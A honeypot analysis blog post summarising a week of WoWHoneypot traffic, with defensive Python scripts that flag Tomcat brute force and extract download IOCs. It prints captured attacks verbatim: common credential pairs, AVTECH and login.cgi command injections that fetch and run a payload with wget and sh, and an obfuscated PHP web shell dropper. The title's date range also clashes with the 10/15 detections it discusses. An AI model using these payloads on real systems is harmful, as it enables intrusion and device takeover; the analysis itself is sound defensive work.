sec-chick Blog

Cyber Security Blog

[Honeypot] WoWHoneypot quick analysis (9/14-9/20)

I currently monitor both Honeytrap and WoWHoneypot, but I had not written up WoWHoneypot much, so I plan to post a weekly summary.

◾️WoWHoneypot
<Detection trends>

(chart image: detection trend)

<Detection count>

(chart image: detection count)

Detections on 10/15 were very high, and most of them were accesses to Tomcat Manager (/manager/html).
They were brute-force attempts against Basic authentication; the usernames and passwords were the sort of combinations you would expect to be in common use (listed below as user:password).
Examples:
123:1q2w3e4r
123:P@$$w0rd1234
123456:1qazXSW@
admin:123
admin:Pa$$w0rd@0
manager:P@$$w0rd1
role1:P@$$w0rd@123456
tomcat:nimda
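To turn the observation above into something you can run over honeypot output, here is an added example (my code for this post, not part of WoWHoneypot) that decodes the Basic credentials from raw requests and flags a source that sends several attempts against the same path. The log entries are constructed: the addresses are RFC 5737 test addresses and the credentials are modelled on the pairs listed above.

```python
"""Count HTTP Basic-auth attempts per source and path (Tomcat Manager brute force).

Added example for this post; it is not code from WoWHoneypot. The log entries
below are constructed (RFC 5737 test addresses, credentials modelled on the
pairs listed in the post).
"""
import base64
from collections import Counter, defaultdict


def build_request(user, password, path="/manager/html"):
    """Build a raw request carrying a Basic credential, as a scanner would send it."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: honeypot.example\r\n"
        f"Authorization: Basic {token}\r\n\r\n"
    )


# Constructed sample: (source IP, raw request) as a honeypot would record them.
SAMPLE_LOG = [
    ("203.0.113.10", build_request("admin", "123")),
    ("203.0.113.10", build_request("admin", "Pa$$w0rd@0")),
    ("203.0.113.10", build_request("manager", "P@$$w0rd1")),
    ("203.0.113.10", build_request("tomcat", "nimda")),
    ("203.0.113.10", build_request("role1", "P@$$w0rd@123456")),
    ("198.51.100.7", build_request("admin", "admin")),
    ("198.51.100.7", "GET / HTTP/1.1\r\nHost: honeypot.example\r\n\r\n"),
    # A non-Basic scheme must be ignored rather than mis-parsed.
    ("198.51.100.7", "GET /manager/html HTTP/1.1\r\nAuthorization: Bearer abc\r\n\r\n"),
]


def parse_basic_auth(raw):
    """Return (method, path, user, password) or None when no usable Basic header."""
    lines = raw.split("\r\n")
    request_line = lines[0].split(" ")
    if len(request_line) < 2:
        return None
    method, path = request_line[0], request_line[1]
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() != "authorization":
            continue
        scheme, _, token = value.strip().partition(" ")
        if scheme.lower() != "basic":
            return None
        try:
            decoded = base64.b64decode(token, validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError subclass
            return None
        # Only the first colon separates user from password (RFC 7617),
        # so a password containing ':' survives intact.
        user, _, password = decoded.partition(":")
        return method, path, user, password
    return None


def summarize(log):
    """Group credential attempts by (source IP, path)."""
    groups = defaultdict(lambda: {"attempts": 0, "users": Counter(), "passwords": set()})
    for src_ip, raw in log:
        parsed = parse_basic_auth(raw)
        if parsed is None:
            continue
        _method, path, user, password = parsed
        group = groups[(src_ip, path)]
        group["attempts"] += 1
        group["users"][user] += 1
        group["passwords"].add(password)
    return groups


def bruteforce_sources(log, threshold=3):
    """Return [(src_ip, path, attempts)] for sources at or above the threshold."""
    return sorted(
        (src_ip, path, group["attempts"])
        for (src_ip, path), group in summarize(log).items()
        if group["attempts"] >= threshold
    )


if __name__ == "__main__":
    for src_ip, path, attempts in bruteforce_sources(SAMPLE_LOG):
        users = summarize(SAMPLE_LOG)[(src_ip, path)]["users"]
        print(f"{src_ip} -> {path}: {attempts} attempts, users {sorted(users)}")
```

The threshold of three attempts per source and path is an arbitrary starting point for a honeypot, where any Basic credential is already suspicious; on a real Tomcat host you would tune it and key on the failed-authentication responses instead.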


<Malware download>
Attacks targeting the AVTECH IP Camera vulnerability were detected; many other honeypot operators have reported seeing the same traffic. The second request below exploits the AVTECH Search.cgi by injecting a shell command into the username= parameter; the first, which fetches a file named dlink, uses the same pattern against the cli= parameter of /login.cgi. In both cases the injected command pulls a file with wget into /tmp and runs it with sh. (hxxp and [.] are defanged; xxx.xxx.xxx.xxx is the masked download host. Headers are shown one per line.)

Download source: hxxp://209[.]141[.]40[.]213/dlink  (count: 12)
Payload:
GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://xxx.xxx.xxx.xxx/dlink%20-O%20-%3E%20/tmp/gexoe;sh%20/tmp/gexoe%27$ HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Sefa

Download source: hxxp://209[.]141[.]40[.]213/avtech  (count: 13)
Payload:
GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20hxxp://xxx.xxx.xxx.xxx/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1
User-Agent: Sefa
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
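Extracting the download URL and the executed file from requests like these is what feeds a table such as the one above. The following is an added example (my own code for this post, not WoWHoneypot's): it percent-decodes each CGI parameter, flags values containing shell separators or command substitution, and pulls out the fetch URL (defanged) and the file passed to sh. The request lines are constructed from the two payloads above with the masked download host replaced by the RFC 5737 test address 192.0.2.44, which is an assumption, not the real host.

```python
"""Pull the injected shell command and its download/exec IOCs out of CGI requests.

Added example for this post, not code from WoWHoneypot. The request lines are
constructed from the two payloads in the post, with the masked download host
replaced by the RFC 5737 test address 192.0.2.44 (an assumption).
"""
import re
from collections import Counter
from urllib.parse import unquote

SAMPLE_REQUEST_LINES = [
    "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.0.2.44/dlink%20-O%20-%3E%20/tmp/gexoe;sh%20/tmp/gexoe%27$ HTTP/1.1",
    "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://192.0.2.44/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1",
    "GET /manager/html HTTP/1.1",  # benign control: no query string at all
]

# Shell separators/substitution that have no business in a CGI parameter value.
SHELL_META = re.compile(r";|\|\||&&|`|\$\(")
# A fetch target; stops at whitespace, quotes and the closers used in the payloads.
URL_RE = re.compile(r"https?://[^\s'\";)<>]+")
# The file handed to sh/bash after the download.
EXEC_RE = re.compile(r"\b(?:sh|bash)\s+([^\s;'\")]+)")


def split_query(query):
    """Split a query string on '&' only and percent-decode each side.

    Done by hand because urllib.parse.parse_qs also split on ';' before
    Python 3.9.2/3.10, which would chop the injected command in half.
    """
    params = []
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            params.append((unquote(name), unquote(value)))
    return params


def defang(url):
    """Render a URL so it cannot be clicked or auto-linked (hxxp, [.])."""
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + slash + path


def analyze_request_line(line):
    """Return the injected parameters and IOCs, or None if nothing looks injected."""
    parts = line.split(" ")
    if len(parts) < 2:
        return None
    method, target = parts[0], parts[1]
    path, _, query = target.partition("?")
    injected = {name: value for name, value in split_query(query) if SHELL_META.search(value)}
    if not injected:
        return None
    download_urls, executed = [], []
    for value in injected.values():
        download_urls += [defang(u) for u in URL_RE.findall(value)]
        executed += EXEC_RE.findall(value)
    return {
        "method": method,
        "path": path,
        "injected_params": injected,
        "download_urls": download_urls,
        "executed": executed,
    }


def download_counts(lines):
    """Tally defanged download URLs across requests, like the table in the post."""
    counts = Counter()
    for line in lines:
        result = analyze_request_line(line)
        if result:
            counts.update(result["download_urls"])
    return counts


if __name__ == "__main__":
    for line in SAMPLE_REQUEST_LINES:
        print(analyze_request_line(line))
    print(download_counts(SAMPLE_REQUEST_LINES))
```

The metacharacter check is deliberately crude: a legitimate parameter can contain a semicolon, so on a production web server this is a triage filter to surface candidates, not a verdict. On a honeypot, where no legitimate client exists, it is enough on its own.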



<Detection status>
Access to Tomcat Manager (/manager/html) dominated by a wide margin. The rest of the list is the usual scanner traffic: phpMyAdmin path enumeration (scripts/setup.php and dozens of index.php directory variants), WebLogic /wls-wsat/CoordinatorPortType probes, GPON router /GponForm/diag_Form requests, and requests with absolute URLs or CONNECT (including the check.proxyradar.com azenv.php POSTs) that test whether the host can be used as an open proxy.

Method  Path  Count   (one request per line; the trailing number is the detection count)
GET /manager/html 4775
GET / 226
GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget hxxp://xxx.xxx.xxx.xxx/avtech -O niXd; chmod 777 niXd; sh niXd)&password=admin 12
POST /wls-wsat/CoordinatorPortType 9
GET hxxp://xxx.xxx.xxx.xxx/testget?q=23333&port=80 5
GET /admin/assets/js/views/login.js 4
GET /wls-wsat/CoordinatorPortType 4
HEAD / 4
GET /HNAP1/ 3
POST /GponForm/diag_Form?images/ 3
GET //MyAdmin/scripts/setup.php 2
GET //myadmin/scripts/setup.php 2
GET //phpMyAdmin/scripts/setup.php 2
GET //phpmyadmin/scripts/setup.php 2
GET //pma/scripts/setup.php 2
GET /admin/phpMyAdmin/index.php 2
GET /claroline/phpMyAdmin/index.php 2
GET /index/article/lists/cid/3 2
GET /login.cgi?cli=aa aa';wget hxxp://xxx.xxx.xxx.xxx/dlink -O -> /tmp/gexoe;sh /tmp/gexoe'$ 2
GET /muieblackcat 2
GET /phpMyAdmin/phpMyAdmin/index.php 2
GET /phpmyadmin/ 2
GET /tools/phpMyAdmin/index.php 2
GET /web/cgi-bin/hi3510/param.cgi?cmd=getp2pattr&cmd=getuserattr 2
GET /web/phpMyAdmin/index.php 2
GET /www/phpMyAdmin/index.php 2
PROPFIND / 2
CONNECT cn.bing.com:443 1
CONNECT www.baidu.com:443 1
GET /.bitcoin/wallet.dat 1
GET /.well-known/security.txt 1
GET //php/phpmyadmin/scripts/setup.php 1
GET //phpMyAdmin-2.6.9/scripts/setup.php 1
GET //phpMyAdmin-xxx.xxx.xxx.xxx/scripts/setup.php 1
GET /?XDEBUG_SESSION_START=phpstorm 1
GET /?a=<foo> 1
GET /PMA/index.php 1
GET /PMA2/index.php 1
GET /admin/PMA/index.php 1
GET /admin/index.php 1
GET /admin/mysql/index.php 1
GET /admin/mysql2/index.php 1
GET /admin/phpmyadmin/index.php 1
GET /admin/phpmyadmin2/index.php 1
GET /admin/pma/index.php 1
GET /ccvv 1
GET /cmx.php?cmd=echo "<?php \$func='c'.'r'.'e'.'a'.'t'.'e'.'_'.'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n';\$test=\$func('\$x','e'.'v'.'a'.'l'.'(b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e(\$x));');\$test('QHNlc3Npb25fc3RhcnQoKTtpZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpeyhzdWJzdHIoc2hhMShtZDUoQCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpJiYkX1NFU1NJT05bJ3RoZUNvZGUnXT10cmltKCRfUE9TVFsnY29kZSddKTt9aWYoaXNzZXQoJF9TRVNTSU9OWyd0aGVDb2RlJ10pKXtAZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VTU0lPTlsndGhlQ29kZSddKSk7fQ=='); ?>" >images.php & echo Hello, Peppa! 1
GET /cmx.php?cmd=echo ^<?php $func='c'.'r'.'e'.'a'.'t'.'e'.'_'.'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n';$test=$func('$x','e'.'v'.'a'.'l'.'(b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e($x));');$test('QHNlc3Npb25fc3RhcnQoKTtpZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpeyhzdWJzdHIoc2hhMShtZDUoQCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpJiYkX1NFU1NJT05bJ3RoZUNvZGUnXT10cmltKCRfUE9TVFsnY29kZSddKTt9aWYoaXNzZXQoJF9TRVNTSU9OWyd0aGVDb2RlJ10pKXtAZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VTU0lPTlsndGhlQ29kZSddKSk7fQ=='); ?^> >images.php & echo Hello, Peppa! 1
GET /console 1
GET /db/index.php 1
GET /dbadmin/index.php 1
GET /favicon.ico 1
GET /index.php 1
GET /login.cgi?cli=aa aa';wget hxxp://xxx.xxx.xxx.xxx/t.php'$ 1
GET /myadmin/index.php 1
GET /myadmin2/index.php 1
GET /mysql-admin/index.php 1
GET /mysql/index.php 1
GET /mysqladmin/index.php 1
GET /phpAdmin/index.php 1
GET /phpMyAbmin/index.php 1
GET /phpMyAdm1n/index.php 1
GET /phpMyAdmin   ---/index.php 1
GET /phpMyAdmin-4.4.0/index.php 1
GET /phpMyAdmin.old/index.php 1
GET /phpMyAdmin/index.php 1
GET /phpMyAdmin__/index.php 1
GET /phpMyAdminold/index.php 1
GET /phpMyAdmion/index.php 1
GET /phpMyadmi/index.php 1
GET /phpMyadmin_bak/index.php 1
GET /phpadmin/index.php 1
GET /phpma/index.php 1
GET /phpmyadm1n/index.php 1
GET /phpmyadmin 1
GET /phpmyadmin-old/index.php 1
GET /phpmyadmin/index.php 1
GET /phpmyadmin/phpmyadmin/index.php 1
GET /phpmyadmin0/index.php 1
GET /phpmyadmin1/index.php 1
GET /phpmyadmin2/index.php 1
GET /pma-old/index.php 1
GET /pma/index.php 1
GET /pmamy/index.php 1
GET /pmamy2/index.php 1
GET /pmd/index.php 1
GET /robots.txt 1
GET /shaAdmin/index.php 1
GET /sitemap.xml 1
GET /typo3/phpmyadmin/index.php 1
GET /upload/bank-icons/bank-gh.jpg 1
GET /upload/bank-icons/bank_16.png 1
GET /v/index.php 1
GET /wallet.dat 1
GET /wallets/wallet.dat 1
GET /webadmin/tpl/style.admin.css 1
GET /webdav/ 1
GET /xampp/phpmyadmin/index.php 1
GET /yealink/y000000000000.cfg 1
GET hxxp://api.ipify.org/ 1
GET hxxp://www.123cha.com/ 1
GET hxxp://www.ip.cn/ 1
GET hxxp://xxx.xxx.xxx.xxx/echo.php 1
GET hxxp://xxx.xxx.xxx.xxx:10083/index.php 1
HEAD /newhome/img/logo.png 1
HEAD /static/upload/20180921/th_317a3298794099e0bab477e4f3d732a4.png 1
OPTIONS /ipc$ 1
POST / 1
POST /cmx.php 1
POST /images.php 1
POST hxxp://check.proxyradar.com/azenv.php?auth=153944726797&a=PSCN&i=2685440439&p=80 1
POST hxxp://check.proxyradar.com/azenv.php?auth=153949072501&a=PSCN&i=2685440439&p=80 1
POST hxxp://check.proxyradar.com/azenv.php?auth=153978850135&a=PSCN&i=2685440439&p=80 1
POST hxxp://check.proxyradar.com/azenv.php?auth=153981707711&a=PSCN&i=2685440439&p=80 1
POST hxxp://check.proxyradar.com/azenv.php?auth=153984761625&a=PSCN&i=2685440439&p=80 1
POST hxxp://check.proxyradar.com/azenv.php?auth=153992111173&a=PSCN&i=2685440439&p=80 1
POST hxxp://check.proxyradar.com/azenv.php?auth=153994958159&a=PSCN&i=2685440439&p=80 1
POST hxxp://check.proxyradar.com/azenv.php?auth=153999669485&a=PSCN&i=2685440439&p=80 1
POST hxxp://check.proxyradar.com/azenv.php?auth=154007072173&a=PSCN&i=2685440439&p=80 1
POST hxxp://check.proxyradar.com/azenv.php?auth=154012893921&a=PSCN&i=2685440439&p=80 1




That concludes this quick analysis.